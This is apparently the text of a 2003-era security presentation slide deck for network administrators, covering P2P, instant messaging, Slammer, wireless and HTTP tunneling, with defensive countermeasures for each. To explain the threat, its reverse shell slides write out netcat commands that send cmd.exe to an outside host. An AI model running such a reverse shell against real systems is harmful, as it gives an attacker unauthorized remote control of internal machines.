
Analysts International
Stuff to Worry About in
Computer Security
A.K.A. “Firewall? I laugh at your puny
V1.0 10-0802
• Mark Lachniet from Analysts International,
Sequoia Services Group
• Senior Security Engineer and Security
Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security
Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux
LPI Certified LPIC-1, Check Point Certified
CCSE, etc.
Peer to Peer file sharing
Instant Messaging
Slammer (just for fun)
Reverse command shells
HTTP Tunneling / GoToMyPC.com
Round table – Q&A – Brainstorming
Peer to Peer File Sharing
Several different networks and clients:
Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
• Different clients have different features,
systems and risks
P2P File Sharing History
• Napster was the first successful and
important one, but napster made one mistake
• Napster used centralized servers that were
under their control
• Hence the system could be shut down by
going after Napster with legal action
• Newer systems have “master” nodes, but all
they do is maintain lists of other peers out on
the network
• Master nodes are replaceable – you could
start your own P2P network by setting up
your own master servers
Napster-Style P2P
• This wasn’t too bad, at least you knew
what to block
Gnutella Style P2P
• This is *bad* for you because there is no
single choke point to cut off
P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via
bandwidth or simultaneous upload and
download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID:
– SHA hashes are unique by file
– ID’s files that are the same but have different names
– Allows for “swarm” downloads where parts of the same file
are downloaded from multiple sources simultaneously (cool)
– Allows for file resumption if a source is unavailable (turned
off, hung up, etc.)
– Allows for a patient person to get almost anything they can
find listed
Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong,
query, query reply, and push
• Use Shareaza to get a good protocol analyzer /
decoder to see them
• Ping and Pong discovery – ask who is out there,
return IP address and amount of shared files
• Query and Query reply – gives search terms
(keywords) and minimum bandwidth requirements.
Reply gives IP address, port, speed, matching files
and GUID of querier
• Querier then connects to the server and attempts to
download the file (this will break if the server is
behind a firewall)
• The Push message is sent if the querier cannot
connect to the server to download the data
Push – Firewall Circumvention
• Sends the querier’s IP and port number and asks the
file host to push the file to it – this will bypass a single
firewall in the mix
• If both parties are behind a firewall you are probably
safe… For now…
• How can you stop it? Use a firewall to block *all*
outgoing communications
• Require a proxy server to mediate all requests
outwards (Squid, MS-PROXY, Border Manager)
• Its only a matter of time before P2P clients can tunnel
within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully
complicated HTTP tunneling software)
• For Gnutella, you can block the “root” servers but an
alternate could always be used
P2P File Share Security Risks
• Spyware Spyware Spyware!
• Usually no virus scanning is done – you need to do
your own
• Spoofed servers will cough up Trojans for almost any
simple query (like the Benjamin Worm)
• Sharing of more than you intended
• “transit” sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software
• Program minimizes (not shuts down) when exited
• P2P specific worms (e.g. the “Gnutella Worm”)
• Content problems and liability!
• Bandwidth leeching
Future P2P Risks
• A lot of things about P2P are “dicey” but haven’t yet
been exploited
• For example, the GUID is a unique identifies that is
sometimes based on MAC address! (pre win2k it is
• That means that queries can be tracked to a
• A monitoring station could also record queries by
GUID/MAC as well as IP address and attempt to
ascertain information about that user (such as sexual
preferences, areas of interest, etc)
• Great possibility for leveraging P2P network as
Denial of Service zombies by tricking all Gnutella
clients into flooding a host (e.g. whitehouse.gov)
P2P “NG” Share Sniffer
• Operates under the creed of “who needs
Napster when you have Windows”
• Scans a subnet for “open” windows shares
and create a database of them
• These open shares are then used as the
storage repositories for various types of files
• This product used to be at sharesniffer.com
but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due the lack of awareness on the part of home
users, this will probably work quite well
Instant Messaging
• IM is everywhere, including my cell phone! (although
I don’t use it)
• Over 81 MILLION users
• Check out:
• http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET
Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order
to work
• Require servers for some functions (login, user
lookup) but can talk directly to nodes for some things
(such as file transfers)
Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself -many
previous hacks, probably many more to come
• May allow remote-control of machines inside the
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing
service contract or your own server
• May be a covered medium under CIPA????
Instant Messaging Problems
Case in Point - msgsnarf
• Dug Song released a number of network sniffing tools
at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their
special features!
• One feature is that it will work on a switch by using
“ARP poisoning” such that even switched networks
are vulnerable to sniffing
• Another feature is the inclusion of application-specific
sniffers such as mailsnarf (all SMTP messages),
webspy (all URLs) and msgsnarf (Instant Message
• This might have a “white-hat” application, actually, if
you need to monitor it
IM management Techniques
• Use an IDS to alert you to matching traffic
(and then go slap the user)
• Block access to the login servers and ports
(refer to infosecurity magazine’s August issue
for details)
• Tightly control the workstation using imaging
and desktop security products
• Require the use of proxy servers (only works
in some cases – disable CONNECT on proxy)
• Use a specialized product to manage and
control the access such as Akonix – this
product can log and control IM and P2P
Hit in late January, 2003
Known as Slammer or Sapphire
Was the fastest spreading worm ever
Took 10 minutes to cross the globe
Doubled the # of infected systems every 8.5
seconds in the first minute (compared to Code
Red, which doubled every 37 minutes)
• Took advantage of an old security bug in
Microsoft SQL server
• Especially hard hit were those with
Microsoft’s MSDE – a desktop version of SQL
• Many people who had patched their SQL
servers with the proper patch were still hit
because of MSDE
• MSDE ships with a variety of products,
including versions of Visio, Microsoft Visual
Studio, etc.
• Took advantage of the fact that SQL server
runs with admin privileges
• Hence attacks on SQL servers are very
dangerous – if they succeed, you can run code
of your choice as admin
• The entire worm was fit into a single UDP
packet of less than 1k!
• If you haven’t yet heard that wireless is
insecure, you have probably been living in a
cave and never get news of the outside world
• Yes, wireless is insecure…. Especially
anything you purchased less than 6 months
ago. Newer stuff is better
• Until recently, the only security that you could
get from the wireless Access Points (APs) was
Wired Equivalency Protection (WEP)
• WEP comes in 64bit and 128bit security
features, neither of which will do you any
good at all if someone really wants to get you
• Wardriving – its fun, its cheap, and your
students think its spiffy
• Wireless leaks – connections can be made
from physical locations outside of your
control by using special hardware and
• Omnidirectional magnetic-mount antennas,
directional antennas, and even pringles cans
do a pretty good job of picking up signals you
never thought possible
• Not only can anyone find your network, but
they can (probably) tell what your SSID is, if
you use WEP, and what vendor your
equipment is
• Above and beyond that, modern software
integrates with a GPS over a serial port to
record the longitude and latitude of your AP
• When posted on the internet, your dirty
laundry is aired out for all to see (*)
• Check out http://www.netstumbler.com for
lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However,
if you ever use an AP without permission, that
is over the line.
From Work to Home
9 Access Points in 15 Minutes
Wireless Security Measures
• There are a few things you can do
• Put access points on a special DMZ segment on a
firewall and restrict traffic
• Require users to use a VPN client to access internal
• Use a modern authentication system such as 802.1X
(in Windows XP) and/or LEAP
• These systems can require a successful authentication
(for example to a Radius server) before allowing a
user to associate with an access point
• Can also require MUTUAL authentication between
the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the
Middle) attack to get auth info by setting up your
own “rogue” AP
Reverse Command Shells
• One would think that if you block all
incoming access, it should be impossible to
access internal systems
• This is only partially true, because it assumes
that the client is honest
• With P2P, IM and everything else, this is
clearly not the case any more – we cannot
trust our users to be security minded
• Reverse command shells, e.g. the NetCat
attack are particularly scary
• Using a utility program such as NetCat, even
a Windows server can be accessed from an
outside server
How Reverse Shells Work
• Imagine the above scenario. Lachniet.com cannot hit
anything on the inside network directly because you
have a firewall, a 10.X network, and no direct
Network Address Translation but the client has
Internet access
How Reverse Shells Work
• Hacker runs NetCat in Listen mode on port 8080 on
lachniet.com (netcat –l –p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all
output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com
How Reverse Shells Work
• The result – full access as logged in user
• To stop it – no outgoing access!
• Except by proxy server
HTTP Tunneling
• It used to be that a firewall, when properly
configured, would stop clients from doing naughty
things (like reverse command shells)
• Ideally we would block all outgoing access, and allow
only web access through a HTTP proxy server
• This is all well and good, but it is also possible to
encapsulate non-HTTP data inside of HTTP requests
and data, and then pass that data down to lower
layers of the OSI model
• In this way, even the most paranoid countermeasures
can be circumvented including a restrictive firewall
and a proxy server
• Technically speaking, it looks something like this:
HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, Solid line is TCP
• Basically the same thing, except you are using
a pay service for your HTTP tunnel
• The service also acts as a broker for who can
connect to your PC
• Hopefully this broker is working properly and
the average hacker CANNOT connect to your
PC (note that I have seen some discussion of
WebEx conferencing having vulnerabilities
along these lines)
• You also get more control and presumably
security through SSL, reporting, users and
groups and such
HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all
traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some
reported success with Raptor/Symantec?)
• Make sure your proxy server doesn’t allow the CONNECT
• Configure an IDS to sense certain types of HTTP
tunneling signatures (RealSecure can detect gotomypc.com
traffic signatures)
• Block all known destination servers such as those from the
gotomypc.com service
• Carefully review your firewall and proxy server logs! If
you see a large amount of HTTP activity going to a single
host (especially one that doesn’t seem legit) check it out –
go browse it yourself
• Log review may be your only recourse!
Q&A and Brainstorming
Mark Lachniet
Sr. Security Engineer
Analysts International